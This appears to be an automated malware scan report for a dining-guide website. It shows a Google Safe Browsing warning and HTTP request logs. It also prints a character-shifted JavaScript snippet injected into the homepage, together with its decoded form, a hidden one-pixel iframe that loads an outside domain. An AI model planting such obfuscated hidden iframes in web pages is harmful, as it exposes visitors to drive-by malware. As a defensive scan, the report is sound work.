Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=augustadiningguide.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://augustadiningguide.com/ | 200 OK Content-Length: 2623 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); Decoded script: <iframe src="http://traffok.cn/out.php" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://augustadiningguide.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: augustadiningguide.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:45:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 2623
Content-Type: text/html
Last-Modified: Tue, 11 Nov 2008 11:45:41 GMT
...2623 bytes of data.
GET / HTTP/1.1
Host: augustadiningguide.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:45:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 2623
Content-Type: text/html
Last-Modified: Tue, 11 Nov 2008 11:45:41 GMT
...2623 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: augustadiningguide.com
Referer: http://www.google.com/search?q=augustadiningguide.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: augustadiningguide.com
Referer: http://www.google.com/search?q=augustadiningguide.com
Result:
The result is similar to the first query. There are no suspicious redirects found.